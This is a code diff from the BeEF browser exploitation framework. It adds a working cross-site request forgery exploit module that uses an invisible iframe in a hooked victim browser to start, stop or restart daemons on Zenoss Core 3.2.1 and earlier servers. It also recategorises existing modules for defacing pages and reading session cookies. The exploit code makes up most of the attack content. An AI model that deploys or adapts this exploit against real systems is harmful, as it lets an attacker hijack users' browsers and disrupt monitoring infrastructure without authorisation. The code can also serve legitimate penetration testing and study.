// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var base = '<%= @base %>';
var service = '<%= @service %>';
var action = '<%= @action %>';
var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(zenoss_daemon_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/zenoss_daemon_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
zenoss_daemon_csrf:
enable: true
category: "Exploits"
name: "Zenoss Daemon CSRF"
description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:
working: ["ALL"]

70
modules/exploits/zenoss_daemon_csrf/module.rb Normal file
View File

@@ -0,0 +1,70 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Zenoss_daemon_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'},
{ 'name' => 'service',
'type' => 'combobox',
'ui_label' => 'Daemon',
'store_type' => 'arraystore',
'store_fields' => ['service', 'description'],
'store_data' => [
['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
['zopectl', 'zopectl (The Zope open source web application server)'],
['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
['zenjobs', 'zenjobs (Zenjobs)'],
['zenping', 'zenping (ICMP ping status monitoring)'],
['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
['zenwin', 'zenwin (Windows Service Monitoring (WMI))'],
['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
['zenjmx', 'zenjmx (ZenJMX)']
],
'emptyText' => 'Select a daemon',
'valueField' => 'service',
'displayField' => 'service', #'description',
'mode' => 'local',
'autoWidth' => true
},
{ 'name' => 'action',
'type' => 'combobox',
'ui_label' => 'Action',
'store_type' => 'arraystore',
'store_fields' => ['action'],
'store_data' => [
['Start'],['Stop'],['Restart']
],
'valueField' => 'action',
'displayField' => 'action',
'mode' => 'local',
'autoWidth' => true
}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

0
modules/browser/alert_dialog/command.js → modules/hooked_domain/alert_dialog/command.js
View File

2
modules/browser/alert_dialog/config.yaml → modules/hooked_domain/alert_dialog/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
alert_dialog:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Create Alert Dialog"
description: "Sends an alert dialog to the hooked browser."
authors: ["wade", "bm"]

0
modules/browser/alert_dialog/module.rb → modules/hooked_domain/alert_dialog/module.rb
View File

0
modules/browser/deface_web_page/command.js → modules/hooked_domain/deface_web_page/command.js
View File

2
modules/browser/deface_web_page/config.yaml → modules/hooked_domain/deface_web_page/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
deface_web_page:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Replace Content (Deface)"
description: "Overwrite the body of the page the hooked browser is on with the 'Deface Content' string."
authors: ["antisnatchor"]

0
modules/browser/deface_web_page/module.rb → modules/hooked_domain/deface_web_page/module.rb
View File

0
modules/browser/get_cookie/command.js → modules/hooked_domain/get_cookie/command.js
View File

2
modules/browser/get_cookie/config.yaml → modules/hooked_domain/get_cookie/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_cookie:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Cookie"
description: "This module will retrieve the session cookie from the current page."
authors: ["bcoles"]

Some files were not shown because too many files have changed in this diff Show More